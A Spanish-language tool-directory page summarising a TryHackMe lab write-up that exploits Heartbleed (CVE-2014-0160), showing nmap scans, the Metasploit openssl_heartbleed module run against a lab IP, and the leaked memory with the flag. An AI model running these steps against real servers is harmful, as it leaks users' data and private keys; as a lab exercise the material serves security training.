Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Project-Field-Analysis-and-Memory-Leak-Demonstration — El objetivo de este proyecto fue evaluar un host remoto en busca de la vulnerabilidad Heartbleed (CVE-2014-0160), verificar su presencia y explotarla para extraer información potencialmente sensible de la memoria del servidor a través del protocolo TLS. | Kitploit
Herramientas/GitHubGitHub/artemcyberlab/project-field-analysis-and-memory-leak-demonstration
Forensia de MemoriaAnálisis de VulnerabilidadesExplotaciónRecopilación de InformaciónPruebas de PenetraciónAprendizaje y Educación
GitHubartemcyberlab/project-field-analysis-and-memory-leak-demonstration

Project-Field-Analysis-and-Memory-Leak-Demonstration

El objetivo de este proyecto fue evaluar un host remoto en busca de la vulnerabilidad Heartbleed (CVE-2014-0160), verificar su presencia y explotarla para extraer información potencialmente sensible de la memoria del servidor a través del protocolo TLS.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
6hace 1 añoAún no revisado

Objetivo El objetivo de este proyecto era evaluar un host remoto para la vulnerabilidad Heartbleed (CVE-2014-0160), verificar su presencia y explotarla para extraer información potencialmente sensible de la memoria del servidor a través del protocolo TLS.

Ejecución

  1. Identificación de servicios abiertos (Nmap) nmap -sC -sV 52.215.184.158 Resultado:

plaintext PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 111/tcp open rpcbind 2-4 443/tcp open ssl/http nginx 1.15.7

| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK | Not valid before: 2019-02-16T10:41:14 | Not valid after: 2020-02-16T10:41:14 El certificado TLS era autofirmado y había expirado. Esto generó sospechas de que la versión de OpenSSL podría estar desactualizada. Puerto objetivo: 443.

  1. Verificación de vulnerabilidad Heartbleed (script de Nmap) nmap -p 443 --script ssl-heartbleed 52.215.184.158 Resultado:

plaintext | ssl-heartbleed: | VULNERABLE: | OpenSSL 1.0.1 is vulnerable to Heartbleed | State: VULNERABLE | Risk factor: High | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 Se confirma que el objetivo es vulnerable a Heartbleed.

  1. Explotación (Metasploit Framework) msfconsole use auxiliary/scanner/ssl/openssl_heartbleed set RHOSTS 52.215.184.158 run Resultado:

plaintext [+] Heartbeat response with leak, 44883 bytes [+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin Memoria volcada con éxito y almacenada localmente para análisis.

  1. Análisis del volcado de memoria strings openssl.heartble_152689.bin | grep -i "THM{" Resultado:

plaintext user_name=hacker101&user_email=[email protected]&user_message=THM{sSl-Is-BaD} Se extrajo con éxito datos confidenciales, incluido un indicador de aplicación, de la memoria TLS, lo que confirma que la vulnerabilidad puede ser explotada prácticamente para filtrar información sensible.

Conclusión Identifiqué y exploté con éxito CVE-2014-0160 en un servidor remoto. El proceso incluyó:

  • Detectar la vulnerabilidad con nmap

  • Explotar la falla usando Metasploit

  • Extraer datos en vivo enviados por el usuario (incluido el indicador THM{sSl-Is-BaD}) de la memoria

Impacto empresarial La presencia de Heartbleed en un sistema expuesto públicamente representa un riesgo crítico:

  • Posible filtración de claves privadas TLS

  • Secuestro de sesión

  • Exposición de nombres de usuario, correos electrónicos y entrada de usuario sensible

Descargar herramienta